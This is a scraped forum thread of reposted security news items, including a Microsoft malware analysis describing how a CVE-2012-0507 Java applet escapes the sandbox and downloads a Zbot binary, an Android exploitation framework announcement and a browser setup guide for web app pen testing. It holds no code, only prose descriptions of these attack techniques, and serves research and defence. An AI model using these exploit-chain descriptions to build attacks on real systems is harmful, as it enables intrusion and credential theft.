  17. Nytro
    binwalk Firmware Analysis Tool [h=1]About[/h]Binwalk is a tool for searching a given binary image for embedded files and executable code. Specifically, it is designed for identifying files and code embedded inside of firmware images. Binwalk uses the libmagic library, so it is compatible with magic signatures created for the Unix file utility. Binwalk also includes a custom magic signature file which contains improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, Linux kernels, bootloaders, filesystems, etc. [h=1]News[/h]Version 0.4.2 includes significant speed improvements over previous versions, as well as the addition of some new search options (--grep and --raw-bytes). Version 0.4.0 released. Added support for Linux block devices and building against libmagic rather than the included file utility code. Fixed minor bugs and updated/added signatures. Version 0.3.9 released. Added build options to disable update features (thus disabling the zlib and libcurl requirements). Added long options. Fixed minor bugs and updated/added signatures. Download: http://code.google.com/p/binwalk/downloads/list Sursa: binwalk - Firmware Analysis Tool - Google Project Hosting
  18. Nytro
    Insecure magazine - RSA Conference Detalii inauntru. Download: http://www.net-security.org/dl/insecure/INSECURE-Mag-RSA2012.pdf
  19. Nytro
    [h=3]An interesting case of JRE sandbox breach (CVE-2012-0507)[/h] msft-mmpc msft-mmpc 9,745 Points 2 1 1 Recent Achievements Blogger III Blogger II New Blog Rater View Profile 20 Mar 2012 2:55 AM Recently we received a few samples that exploit the latest patched JRE (Java Runtime Environment) vulnerability. These samples are kind of unusual to see, but they can be used to develop highly reliable exploits. The malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files - one Java class file triggers the vulnerability and the other one is a loader class used for loading. The vulnerability triggering class is actually performing deserialization of an object array and uses a vulnerability in the AtomicReferenceArray to disarm the JRE sandbox mechanism. The attacker deliberately crafted serialized object data. This reference array issue is very serious since the exploit is not a memory corruption issue, but a logical flaw in the handling of the array. So the exploit is highly reliable and that might be one of the reasons why the bad guys picked up this vulnerability for their attacks. We determined this vulnerability to be CVE-2012-0507. Figure 1 The vulnerability triggering class The loader class is called from the vulnerability triggering class. This loader class can load additional classes in an escalated privilege context and perform any operations escaping the sandbox mechanism. This loader class creates a new class on the fly and uses it to do malicious jobs with escalated privileges. The 3rd class that is loaded by the loader class downloads a malicious file and decodes it using a simple XOR algorithm. It saves it into a local temporary folder and executes the file using Runtime's exec method. The decoded malicious file is detected as PWS:Win32/Zbot.gen!Y. The following diagram shows the overall process of exploitation. A.class is the vulnerability triggering class, B.class is the loading class and C.class is the 3rd class that downloads, decodes and executes a malicious binary. Figure 2 The overall view of exploitation The following code shows the actual decoding code inside the C.class file. The routine is using a very simple form of XOR decoding. Figure 3 Decoding routine inside C.class file Example SHA1s: fc1ab8bf716a5b3450701ca4b2545888a25398c9 (detected as Exploit:Java/CVE-2012-0507.A) 03e26e735b2f33b3b212bea5b27cbefb2af4ed34 (detected as Exploit:Java/CVE-2012-0507. The good news is that the vendor has provided a patch for this vulnerability since late February. Just make sure you have the latest JRE version installed on your system. Or you can visit this patch update advisory page to see if you require any updates. So please, update your JRE installations and protect yourself. Jeong Wook (Matt) Oh & Chun Feng Sursa: An interesting case of JRE sandbox breach (CVE-2012-0507) - Microsoft Malware Protection Center - Site Home - TechNet Blogs
  20. Nytro
    [h=3]Acquisition and Analysis of Volatile Memory from Android Devices[/h] [h=2]Monday, January 9, 2012[/h] We are happy to announce that our paper on Android memory forensics has just been published in the Journal of Digital Investigations! This paper covers a number of topics that we believe will be of interest to both practitioners and researchers in the memory forensics field. The two main contributions of the paper are: A kernel module that is able to acquire a complete memory capture from Android devices as well as other Linux computers. This module is also unique in that it operates solely within the kernel and does not require userland interaction. This preserves memory much more effectively than other kernel modules, and a complete comparison of the efficiency is given in the paper. The kernel module can also acquire memory over the network, which prevents the investigator from having to save to the phone’s internal storage or SD card. Additions to the Volatility memory analysis framework that allow it to analyze Android kernel memory. This allows all of the Linux analysis plugins to be used against Android memory captures. There is also discussion on the difficulty of performing generic memory analysis of Android devices as well as the differences of the ARM versus Intel architecture, where a majority of previous memory forensics research has been performed. If you are interested in this research and are going to be at Shmoocon, Joe Sylve (@jtsylve) will be there presenting the memory acquisition module as well as the Volatility capabilities. You can also leave comments on the blog or find us on Twitter. Download: http://digitalforensicssolutions.com/papers/android-memory-analysis-DI.pdf Sursa: Digital Forensics Solutions: New Paper - Acquisition and Analysis of Volatile Memory from Android Devices
  21. Nytro
    Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities A free framework for bug hunters to find vulnerabilities, write proof-of-concept exploits and play in Android. Use dynamic analysis on Android applications and devices for quicker security assessments. Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices. The easy extensions interface allows users to write custom modules and exploits for Mercury Replace custom applications and scripts that perform single tasks with a framework that provides many tools. Mercury allows you to: Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see) Find information on installed packages with optional search filters to allow for better control Built-in commands that can check application attack vectors on installed applications Tools to upload and download files between the Android device and computer without using ADB (this means it can be done over the internet as well!) Create new modules to exploit your latest finding on Android, and playing with those that others have found. This demonstration shows how you can find and exploit SQL injection in Android applications using Mercury. Download: http://labs.mwrinfosecurity.com/assets/254/mercury-v1.0.zip Guide: http://www.reddit.com/tb/r3atb Sursa: Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities | The Hacker News (THN)
  22. Nytro
    Info: http://www.securitybydefault.com/2012/03/exploit-de-joomla-paso-paso.html
  23. Nytro
    [h=1]VIDEO: How to solve the RSA 2012 #sophospuzzle[/h] by Paul Ducklin on March 20, 2012 | Comments (2) Filed Under: Featured, Video Here is a showing you how to solve the RSA 2012 crypto puzzle which featured on our conference T-shirts at this year's RSA hootenanny in San Francisco. We've awarded one NERF gun prize to the first finisher, @trapflag, and a second to Robert Miller, who was randomly chosen (using a hardware random number generator made from coins and playing cards) from the 19 other successful solvers. Winners, please email me to let me know where to send the prizes. For those of you who didn't finish, here's how to do it: (Enjoy this video? Check out more on the SophosLabs YouTube channel.) The second stage of this puzzle involved writing code to perform a cryptographic brute force attack; although there were numerous optimisations you could apply, there were no short cuts. That means that you really had to back yourself that your code was correctly written - so well done to all who took part, and especially to the 20 of you who cracked the puzzle in time. If you enjoy this sort of puzzle, watch this space: we intend to run them regularly. You might also enjoy watching or trying previous #sophospuzzles! Sursa: VIDEO: How to solve the RSA 2012 #sophospuzzle | Naked Security
  24. Nytro
    [h=3]SSL optimization and security talk[/h] Filed under: Crypto,Network,Protocols,Security — Nate Lawson @ 6:12 am I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention. False Start provides a minor improvement over stock SSL, which takes two round trips in the initial handshake before application data can be sent. It saves one round trip on the initial handshake at the cost of sending data before checking for someone modifying the server’s handshake messages. It doesn’t provide any benefit on subsequent connections since the stock SSL resume protocol only takes one round trip also. The False Start designers were aware of this risk, so they suggested the client whitelist ciphersuites for use with False Start. The assumption is that an attacker could get the client to provide ciphertext but wouldn’t be able to decrypt it if the encryption was secure. This is true most of the time, but is not sufficient. The BEAST attack is a good example where ciphersuite whitelists are not enough. If a client used False Start as described in the standard, it couldn’t detect an attacker spoofing the server version in a downgrade attack. Thus, even if both the client and server supported TLS 1.1, which is secure against BEAST, False Start would have made the client insecure. Stock SSL would detect the version downgrade attack before sending any data and thus be safe. The False Start standard (or at least implementations) could be modified to only allow False Start if the TLS version is 1.1 or higher. But this wouldn’t prevent downgrade attacks against TLS 1.1 or newer versions. You can’t both be proactively secure against the next protocol attack and use False Start. This may be a reasonable tradeoff, but it does make me a bit uncomfortable. Snap Start removes both round trips for subsequent connections to the same server. This is one better than stock SSL session resumption. Additionally, it allows rekeying whereas session resumption uses the same shared key. The security cost is that Snap Start removes the server’s random contribution. SSL is designed to fail safe. For example, neither party solely determines the nonce. Instead, the nonce is derived from both client and server randomness. This way, poor PRNG seeding by one of the participants doesn’t affect the final output. Snap Start lets the client determine the entire nonce, and the server is expected to check it against a cache to prevent replay. There are measures to limit the size of the cache, but a cache can’t tell you how good the entropy is. Therefore, the nonce may be unique but still predictable. Is this a problem? Probably not, but I haven’t analyzed how a predictable nonce affects all the various operating modes of SSL (e.g., ECDH, client cert auth, SRP auth, etc.) The key insight between both of these proposed changes to SSL is that latency is an important issue to SSL adoption, even with session resumption being built in from the beginning. Also, Google is willing to shift the responsibility for SSL security towards the client in order to save on latency. This makes sense when you own a client and your security deployment model is to ship frequent client updates. It’s less clear that this tradeoff is worth it for SSL applications besides HTTP or other security models. I appreciate the work people like Adam have been doing to improve SSL performance and security. Obviously, unprotected HTTP is worse than some reductions in SSL security. However, careful study is needed for the many users of these kinds of protocol changes before their full impact is known. I remain cautious about adopting them. Sursa: SSL optimization and security talk
  25. Nytro
    [h=3]Configuring Firefox For Web App Pen Testing[/h][h=2]15 March 2012[/h] You know the routine: you get a gig doing a web app pen test. You break out Burp (or whatever lesser proxy you prefer), and get ready to ruin some developer's day. And then, just as you get ready to load the target URL and start, this happens: It's annoying. Your logs are polluted, and if you have to turn them over to the client, the extra noise strips some of the professionalism from your image (as a sidenote: Burp's "only save in-scope items" feature helps quite a lot with this). Here then, is a quick guide on how to tweak Firefox so that it doesn't spew stupid crap in your web app pen test log files. I may come back and explain the "why" behind some of these later, but for now, just the "how" will have to do. (Note: some of these settings reduce the security of the browser. My presumption here is that Firefox will only be used for testing, not for general purpose browsing. The settings below reflect that.) 1) Open about:config 2) Disable Safe Browsing 3) Disable Pipelining 4) Disable Pre-fetching 5) Remove all bookmarks 6) Set homepage to about:blank for startup 7) Make sure history is enabled, but disable search suggestions 8) Disable checking for updates 9) Just say no to helping developers 10) Disable updates for sync That's it. Now you can go forth, and break all the things, knowing that your log files will be nice and tidy afterwards. Posted by Jason Ross at 14:04 Sursa: cruft: Configuring Firefox For Web App Pen Testing
×
×
  • Create New...